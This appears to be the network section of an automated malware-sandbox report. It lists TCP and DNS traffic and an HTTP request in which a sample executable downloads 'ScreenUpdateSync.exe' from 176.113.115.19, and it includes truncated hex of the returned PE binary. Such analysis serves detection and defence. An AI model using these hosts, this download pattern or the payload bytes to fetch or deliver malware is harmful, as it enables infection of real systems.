Dec 11, 2024 06:57:03.232547998 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.232559919 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.232605934 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.236103058 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.236160040 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.236238003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.236284971 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.239747047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.239818096 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.239844084 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.239888906 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.243388891 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.243438959 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.243451118 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.243491888 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.246997118 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.247054100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.247121096 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.247164011 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.250600100 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.250653028 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.250710964 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.250751019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.343223095 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.343235016 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.343405962 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.344660997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.344712973 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.344747066 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.344793081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.347912073 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.347961903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.347965956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.348009109 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.351202965 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.351253986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.351366997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.351414919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.354499102 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.354546070 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.354582071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.354631901 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.357733011 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.357785940 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.357819080 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.357868910 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.361061096 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.361135006 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.361149073 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.361198902 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.364315033 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.364365101 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.364438057 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.364485025 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.367613077 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.367657900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.367759943 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.367808104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.370935917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.370986938 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.371026039 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.371073961 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.374263048 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.374311924 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.374346018 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.374387026 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.377479076 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.377533913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.377666950 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.377710104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.380745888 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.380798101 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.380860090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.380902052 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.384047031 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.384114981 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.384171009 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.384217024 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.387334108 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.387387991 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.387485027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.387526035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.390660048 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.390718937 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.390777111 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.390821934 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.393917084 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.393975019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.394007921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.394049883 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.397223949 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.397269964 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.397331953 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.397377968 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.399916887 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.399940014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.399966955 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.399996996 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.402483940 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.402542114 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.402604103 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.402647018 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.405129910 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.405179977 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.405268908 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.405312061 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.407820940 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.407888889 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.407932997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.407975912 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.410429001 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.410465956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.410517931 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.410530090 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.413096905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.413156986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.413196087 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.413239956 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.415641069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.415698051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.415738106 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.415786982 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.418334007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.418384075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.418423891 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.418467999 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.423335075 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.423346996 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.423409939 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.423553944 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.423603058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.423676968 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.423722029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.426178932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.426254988 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.426273108 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.426340103 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.428831100 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.428889036 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.428936005 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.428986073 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.431502104 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.431560040 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.431588888 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.431638956 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.434093952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.434144020 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.434207916 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.434268951 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.436753035 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.436810017 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.436863899 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.436913967 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.439352989 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.439395905 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.439472914 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.439529896 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.442042112 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.442086935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.442111969 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.442137003 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.444667101 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.444731951 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.444797993 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.444845915 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.447262049 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.447326899 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.447393894 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.447438002 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.449924946 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.449987888 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.450047970 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.450093031 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.452548027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.452603102 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.452662945 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.452709913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.455157995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.455234051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.455281973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.455353975 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.457798958 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.457861900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.457880020 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.457926989 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.460453987 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.460520983 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.460566998 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.460617065 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.463140965 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.463156939 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.463200092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.463228941 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.465727091 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.465795040 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.465818882 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.465864897 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.468355894 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.468411922 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.468466997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.468521118 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.471003056 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.471070051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.471100092 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.471147060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.473673105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.473718882 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.473754883 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.473779917 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.476274967 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.476329088 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.476356030 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.476402998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.478905916 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.478965998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.479036093 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.479082108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.481547117 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.481597900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.481657028 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.481702089 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.484188080 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.484244108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.535173893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.535228014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.535259008 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.535283089 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.536096096 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.536149025 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.536159992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.536201000 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.538393974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.538449049 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.538460016 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.538496017 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.540615082 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.540668964 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.540761948 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.540815115 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.543034077 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.543092966 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.543190002 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.543240070 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.545042992 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.545099020 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.545145988 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.545191050 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.547306061 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.547368050 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.547379017 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.547434092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.549541950 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.549588919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.549644947 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.549696922 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.551723003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.551778078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.551812887 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.551861048 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:05.955655098 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:57:06.075350046 CET	80	49732	92.255.57.89	192.168.2.4
Dec 11, 2024 06:57:06.075998068 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:57:06.076244116 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:57:06.195514917 CET	80	49732	92.255.57.89	192.168.2.4
Dec 11, 2024 06:57:07.405625105 CET	80	49732	92.255.57.89	192.168.2.4
Dec 11, 2024 06:57:07.405685902 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:57:07.408164978 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:57:07.527388096 CET	80	49732	92.255.57.89	192.168.2.4
Dec 11, 2024 06:57:07.821131945 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:07.827950001 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:07.855370998 CET	80	49732	92.255.57.89	192.168.2.4
Dec 11, 2024 06:57:07.856254101 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:57:12.857558012 CET	80	49732	92.255.57.89	192.168.2.4
Dec 11, 2024 06:57:12.859998941 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:57:56.754287004 CET	49732	80	192.168.2.4	92.255.57.89
Dec 11, 2024 06:58:48.660131931 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:58:49.031645060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:58:49.640930891 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:58:50.844053984 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:58:53.344084978 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:58:58.156582117 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:59:07.772145033 CET	49731	80	192.168.2.4	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 06:56:58.696532011 CET	59850	53	192.168.2.4	1.1.1.1
Dec 11, 2024 06:56:58.928354979 CET	53	59850	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 06:56:58.696532011 CET	192.168.2.4	1.1.1.1	0x77f7	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 06:56:58.928354979 CET	1.1.1.1	192.168.2.4	0x77f7	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 11, 2024 06:56:58.928354979 CET	1.1.1.1	192.168.2.4	0x77f7	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

176.113.115.19

92.255.57.89

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	176.113.115.19	80	7732	C:\Users\user\Desktop\SEejSLAS9f.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 06:57:01.250897884 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 11, 2024 06:57:02.574893951 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 05:57:02 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 11 Dec 2024 05:45:01 GMT ETag: "4a400-628f819509315" Accept-Ranges: bytes Content-Length: 304128 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e4 4b a7 de a0 2a c9 8d a0 2a c9 8d a0 2a c9 8d be 78 4d 8d bc 2a c9 8d be 78 5c 8d b4 2a c9 8d be 78 4a 8d f8 2a c9 8d 87 ec b2 8d ab 2a c9 8d a0 2a c8 8d ca 2a c9 8d be 78 43 8d a1 2a c9 8d be 78 5d 8d a1 2a c9 8d be 78 58 8d a1 2a c9 8d 52 69 63 68 a0 2a c9 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b7 fe df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 7e 9d 05 00 02 00 00 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$K**xMx\xJ**xCx]xXRich*PELd?@ B~'dA0l.text `.rdataj "@@.data=@l@.rsrc0A@@
Dec 11, 2024 06:57:02.574912071 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 58 10 43 00 3b 0d 04 40 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 40 25 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d Data Ascii: %XC;@Cujh@%Cutu=uCjYeVYEtVPYYE}u7ujYVj5jCCuCPmYUQeVEPuu/u9Et
Dec 11, 2024 06:57:02.574930906 CET	1236	IN	Data Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78 Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xhCthCphClhC5hhC=dhCfhCfhCf`hCf\hCf%XhCf-ThChCE\|hCEhCEhCgChC\|gCpgCt
